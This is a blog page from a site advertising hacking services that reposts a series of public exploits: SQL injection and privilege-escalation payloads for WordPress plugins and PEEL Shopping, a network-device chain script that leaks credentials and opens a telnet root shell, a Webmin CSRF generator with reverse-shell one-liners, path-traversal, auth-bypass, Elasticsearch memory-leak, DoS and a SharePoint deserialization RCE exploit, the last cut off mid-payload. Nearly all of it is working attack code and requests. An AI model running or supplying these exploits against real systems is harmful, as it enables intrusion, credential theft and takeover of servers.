Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863144949

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want
HireHackking 
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests

urllib3.disable_warnings()

CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245


def race_papi_message(ip):

    global CONTINUE_RACE

    payload = b"\x49\x72"
    payload += b"\x00\x03"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x00\x00"
    payload += b"\x00\x00"
    payload += b"\x3B\x7E"
    payload += b"\x41\x41"
    payload += b"\x04\x22"
    payload += b"\x00\x00"
    payload += b"\x02\x00"
    payload += b"\x00\x00"
    payload += b"\x00" * 12 * 4
    text_to_send = bytes()
    for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
        text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)

    packet = payload + text_to_send

    while CONTINUE_RACE:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((ip, 8211))
        s.send(packet)
        s.close()
        time.sleep(0.004)


def find_credentials(text):
    res = re.search("mgmt-user .*", text)[0]
    res = res.split(" ")
    return (res[1], res[2])


def login(ip, username, password):
    login_data = {
            "opcode": "login",
            "user": username,
            "passwd": password,
            "refresh": "false",
    }
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)

    root = ET.fromstring(res.text)
    return root.find("./data[@name='sid']").text


def create_directory(ip, sid):
    request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
    if "/tmp/oper_" in res.text:
        print("[+] Successfully created /tmp/oper_/ directory :)")
        return True
    else:
        print("[-] Failed creating /tmp/oper_/ directory")
        return False


def prepare_upload_id(command):
    base_payload = "/../../etc/httpd/"
    cmd_len = len(command)
    padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8  # for the .gz at the end and the '; + spaces
    if padding_len < 0:
        print("[-] Command too long length:{}".format(padding_len))
        exit(1)
    return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)    


def create_file(ip, command):
    upload_id = prepare_upload_id(command)
    requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)


def run_command(ip, command):
    print("[*] Executing telnet")
    command = command.replace("?", "%3F")
    command = command.replace("#", "\\\\x23")
    s = requests.Session()
    req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
    prep = req.prepare()
    response = s.send(prep, verify=False)
    return response.text

def build_command(command):
    command = command.replace("/", "\\\\x2F")
    command = command.replace("#", "\\\\x23")
    command = command.replace("\"", "\\\"")
    command = command.replace("`", "\`")
    final_command = "echo -e \"{}\"|sh".format(command)
    return final_command

def telnet_connect(router_ip):
    print("[*] Connecting to telnet")
    with telnetlib.Telnet(router_ip, 22222) as tn:
        tn.write(b"rm /etc/httpd/A*sh*.gz\n")
        tn.interact()


def main():

    global CONTINUE_RACE

    ip = sys.argv[1]

    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
    papi_thread.start()

    while CONTINUE_RACE:
        time.sleep(0.1)
        res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
        if "version" in res.text:
            print("[+] Successfully leaked the password from config")
            CONTINUE_RACE = False

    file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
    user, password = find_credentials(file_content)

    print("[+] Successfully extracted username: {} and password: {}".format(user, password))
    sid = login(ip, user, password)
    print("[*] SID generated: {}".format(sid))

    command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
    final_command = build_command(command)

    if not create_directory(ip, sid):
        return

    print("[*] Creating malicious file in /etc/httpd/")
    create_file(ip, final_command)
    print(run_command(ip, final_command))
    time.sleep(1) # Sleeping waiting for telnet.
    telnet_connect(ip)


if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!
HireHackking 
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Date: 19/07/2021
# Exploit Author: Aakash Choudhary
# Software Link: https://wordpress.org/plugins/kn-fix-your/
# Version: 1.0.1
# Category: Web Application
# Tested on Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate KN Fix Your Title
3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
HireHackking

PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

HACKER · %s · %s

# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection # Date: 2021-07-10 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.peel.fr # Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download # Version: prior to 9.4.0 # Tested on: Windows 10, XAMPP # Reference: https://github.com/advisto/peel-shopping/issues/3 # CVE: CVE-2021-37593 ################ # Description # ################ # PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. ##################### # PoC of detection # ##################### 1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel". PoC #1) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) Request: The response duration = 418 bytes | 7,719 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE. PoC #2) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) Request: The response duration = 418 bytes | 5,112 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly. PoC #3) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) Request: The response duration = 418 bytes | 10,140 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- # For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. # The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1 # The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
HireHackking

Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)

HACKER · %s · %s

# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) # Date: 24/04/2021 # Exploit Author: Mesh3l_911 & Z0ldyck # Vendor Homepage: https://www.webmin.com # Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 # Version: Webmin 1.973 # Tested on: All versions <= 1.973 # CVE: CVE-2021-31761 # Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to # get a Remote Command Execution (RCE) through the Webmin's running process # feature import time, subprocess,random,urllib.parse print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/ \033[1;m''') for i in range(101): print( "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( i), "\033[1;36m%\033[1;m", end="") time.sleep(0.02) print("\n\n") target = input( "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") if target.endswith('/'): target = target + 'tunnel/link.cgi/' else: target = target + '/tunnel/link.cgi/' ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") ReverseShell = input \ ('''\033[1;37m \n 1- Bash Reverse Shell \n 2- PHP Reverse Shell \n 3- Python Reverse Shell \n 4- Perl Reverse Shell \n 5- Ruby Reverse Shell \n \033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') file_name = random.randrange(1000) if ReverseShell == '1': ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' elif ReverseShell == '2': ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' elif ReverseShell == '3': ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' elif ReverseShell == '4': ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' elif ReverseShell == '5': ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' else: print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") def CSRF_Generator(): Payload = urllib.parse.quote(''' <html> <head> <meta name="referrer" content="never"> </head> <body> <script>history.pushState('', '', '/')</script> <form action="/proc/run.cgi" method="POST"> <input type="hidden" name="cmd" value="''' + ReverseShell + '''" /> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="user" value="root" /> <input type="hidden" name="input" value="" /> <input type="hidden" name="undefined" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ''') print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") print(target+Payload) def Netcat_listener(): print() subprocess.run(["nc", "-nlvp "+port+""]) def main(): CSRF_Generator() Netcat_listener() if __name__ == '__main__': main()
HireHackking
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php 05.07.2021 -- GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...
HireHackking

KevinLAB BEMS 1.0 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5655 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php 05.07.2021 -- PoC POST data payload (extract): -------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] PoC POST data payload (authbypass): ----------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
HireHackking

ElasticSearch 7.13.3 - Memory disclosure

HACKER · %s · %s

# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure # Date: 21/07/2021 # Exploit Author: r0ny # Vendor Homepage: https://www.elastic.co/ # Software Link: https://github.com/elastic/elasticsearch # Version: 7.10.0 to 7.13.3 # Tested on: Kali Linux # CVE : CVE-2021-22145 #/usr/bin/python3 from argparse import ArgumentParser import requests from packaging import version import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print("\n################################################################################################") print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######") print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######") print("################################################################################################\n") parser = ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service") parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="") parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="") args = parser.parse_args() if not (args.url): parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"') #Prepare authentication header authorization_header = "" if(args.api_key or args.basic): authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic #Check elasticsearch version r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False) try: es_version = json.loads(r.content)["version"]["number"] except: print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n") print("# Server response: " + str(r.content)) exit() if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"): print("# Elastic Service not vulnerable") print("# Elastic Service version: " + es_version) print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") exit() #Prepare exploitation payload = "@\n" vulnerable_endpoint = "/_bulk" url = args.url + vulnerable_endpoint #Exploitation print("# ElasticSearch Version: " + es_version) print("# Request to " + url+"\n") r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False) #Read Memory Leak and remove stacktrace print("$$$$$$$$$$$$$$$$$$$$$$$$$") print("$$$$$ Memory Leaked $$$$$") print("$$$$$$$$$$$$$$$$$$$$$$$$$\n") response = json.loads(r.content) leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0] leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0] print(leak1+"\n"+leak2)
HireHackking

Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)

HACKER · %s · %s

# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.leawo.org # Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html # Exploit Author: Achilles # Tested Version: 11.0.0.1 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Leawo Prof. Media # 4.- Click Activation Center # 5.- Paste the content of EVIL.txt into the Field: 'Keycode' # 6.- Click 'Register' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: f = open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
HireHackking

Microsoft SharePoint Server 2019 - Remote Code Execution (2)

HACKER · %s · %s

# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2) # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit(object): # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} self.payload = """\ <DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram 